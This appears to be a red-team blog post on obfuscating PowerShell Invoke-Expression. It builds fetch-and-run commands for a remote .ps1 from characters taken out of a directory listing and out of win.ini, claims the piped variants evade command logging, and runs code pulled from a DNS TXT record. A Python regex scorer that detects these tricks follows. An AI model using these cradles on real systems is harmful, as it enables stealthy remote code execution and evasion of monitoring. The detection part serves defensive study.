Red Team Tips: Powershell Invoke Expression (iex)

Inspired by the recent nslookup bypass you can do with PowerShell, I invested some time in seeing whether the Windows filesystem could be used to do a similar thing.

Here is what I have so far. When I hosted a ps1 script that simply had notepad in it, it popped up:

$x=(ls C:\Windows\System32\drivers\etc);$x=$x.name;$x=$x[0]+$x[1]+$x[2]+$x[3]+$x[4]+$x[5];$y=(gc C:\Windows\win.ini);$y=$y[2];$x[33]+$x[1]+$x[28]+$x[26]+$x[34]+$x[4]+$x[0]+$x[26]+$x[40]+$x[40] ($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)"))

Never mind: after reviewing Event Viewer and the PowerShell logs, the command shows up as if I'd typed it.

I figured out you can also use PowerShell to execute commands similar to the nslookup method:

& powershell (Resolve-DnsName -Name zsecure.uk -Type txt)[-1].Strings

I did something different with the top script, and this time it logs PowerShell but not the command. I think I have found a bypass. I was wrong before, so I am probably wrong now.

$x=[string]::join("",((ls C:\Windows\System32\drivers\etc).Name.Split("`n")));$y=(gc C:\Windows\win.ini);$y=$y[2];($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)") | powershell

Fewer characters:

$x=[string]::join("",((ls C:\Windows\System32\drivers\etc).Name.Split("`n")));$y=(gc C:\Windows\win.ini)[2];($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)")|powershell
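From the defender's side, the tell in all of these one-liners is that the executed text is assembled from data (a directory listing, win.ini, a DNS TXT record) rather than appearing literally. The scorer below is an added example, not code from the original post: it runs constructed regexes over script block text (the three one-liners above plus two benign admin commands as constructed samples); the indicator names, weights and threshold are my own assumptions.

```python
import re

# Constructed regexes for the tricks shown in the post: single-character indexing into a
# directory listing or win.ini contents, joined into a command and handed to powershell.
INDICATORS = {
    # three or more indexed characters concatenated, e.g. $x[33]+$x[1]+$x[28]
    "indexed_char_concat": re.compile(r"(\$\w+\[-?\d+\]\s*\+\s*){2,}\$\w+\[-?\d+\]"),
    # directory listing of drivers\etc used as a character source
    "hosts_dir_listing": re.compile(r"\b(ls|dir|gci|get-childitem)\s+\S*drivers\\etc\b", re.I),
    # win.ini contents used as a character source
    "win_ini_read": re.compile(r"\b(gc|cat|type|get-content)\s+\S*win\.ini\b", re.I),
    "string_join": re.compile(r"\[string\]::join\(", re.I),
    # assembled text handed to a new powershell process via pipe or call operator
    "pipe_to_powershell": re.compile(r"(\|\s*|&\s*)powershell(\.exe)?\b", re.I),
    # DNS TXT record contents used as the command
    "dns_txt_strings": re.compile(r"resolve-dnsname\b.*-type\s+txt\b.*\.strings", re.I),
}
SOURCES = {"hosts_dir_listing", "win_ini_read", "dns_txt_strings"}
EXECUTION = {"indexed_char_concat", "string_join", "pipe_to_powershell"}


def indicators(script_block: str) -> list[str]:
    """Names of the indicators matched by one script block (e.g. event 4104 text)."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_block)]


def score(script_block: str) -> int:
    """One point per indicator, plus three when a data source is combined with assembly
    or execution: either alone is common in admin scripts, the combination is not."""
    hits = set(indicators(script_block))
    bonus = 3 if (hits & SOURCES) and (hits & EXECUTION) else 0
    return len(hits) + bonus


def is_suspicious(script_block: str, threshold: int = 4) -> bool:
    return score(script_block) >= threshold


# Constructed sample script blocks: the three from the post plus two benign admin commands.
SAMPLES = {
    "post_v1": r'$x=(ls C:\Windows\System32\drivers\etc);$x=$x.name;$x=$x[0]+$x[1]+$x[2]+$x[3]+$x[4]+$x[5];$y=(gc C:\Windows\win.ini);$y=$y[2];$x[33]+$x[1]+$x[28]+$x[26]+$x[34]+$x[4]+$x[0]+$x[26]+$x[40]+$x[40] ($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)"))',
    "post_dns": r"& powershell (Resolve-DnsName -Name zsecure.uk -Type txt)[-1].Strings",
    "post_v2": r'$x=[string]::join("",((ls C:\Windows\System32\drivers\etc).Name.Split("`n")));$y=(gc C:\Windows\win.ini)[2];($y[7]+$y[1]+$y[2]+"(" +$y[7]+$x[28]+$x[34]+" http://127.0.0.1/1.ps1)")|powershell',
    "benign_ls": r"Get-ChildItem C:\Windows\System32\drivers\etc | Select-Object Name",
    "benign_gc": r"Get-Content C:\Windows\win.ini | Select-String fonts",
}

if __name__ == "__main__":
    for name, block in SAMPLES.items():
        print(f"{name:10} score={score(block):2} suspicious={is_suspicious(block)} {indicators(block)}")
```

The piped variants still leave the outer one-liner in whatever script block or command-line logging the parent shell produces, which is where this scorer is meant to run.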